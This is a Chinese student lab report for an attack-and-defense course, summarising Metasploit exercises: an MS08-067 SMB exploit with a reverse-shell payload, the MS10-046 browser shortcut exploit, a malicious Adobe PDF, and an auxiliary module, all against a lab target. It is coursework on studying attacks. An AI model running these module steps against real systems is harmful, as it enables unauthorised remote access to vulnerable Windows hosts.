20192407 2021-2022-2 《网络与系统攻防技术》实验六实验报告
作者:互联网
1.实验内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,尽量使用最新的类似漏洞;
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
1.4 成功应用任何一个辅助模块。
2.实验过程
1.1一个主动攻击实践,尽量使用最新的类似漏洞;
启动msf,使用search ms08-067指令搜索漏洞
使用use exploit/windows/smb/ms08_067_netapi指令选择相应的模块
使用show payloads,set payload generic/shell_reverse_tc指令p获取靶机shell
配置rhost,lhost,lport并进行exploit监听
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
使用search ms10_046指令查找漏洞,并使用use use exploit/windows/browser/ms10_046_shortcut_icon_指令
做好相应的配置
开始监听
在靶机上打开对应的网址
使用session -i 1指令获取连接
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
使用search adobe指令进行搜素
使用use windows/fileformat/adobe_flashplayer_button指令并进行相应的配置。
将生成的pdf文件放入靶机,主机监听的同时在靶机上运行该pdf文件
1.4 成功应用任何一个辅助模块。
使用show auxiliary指令,显示所有的辅助模块
使用webdav:
3.问题及解决方案
- 问题1:监听浏览器经常失败
- 问题1解决方案:换了adobereader的版本
4.学习感悟、思考等
本次实验较为简单,主要是在操作msfconsole的功能,但实际操作中仍然出现不少问题,但这些问题也让我对于监听的过程和功能有了更进一步的了解,也对与自身的粗心(输错代码等问题)有了认识并加以改正。
标签:use,20192407,漏洞,指令,2021,2022,使用,靶机,监听 来源: https://www.cnblogs.com/xingjiyuan/p/16269703.html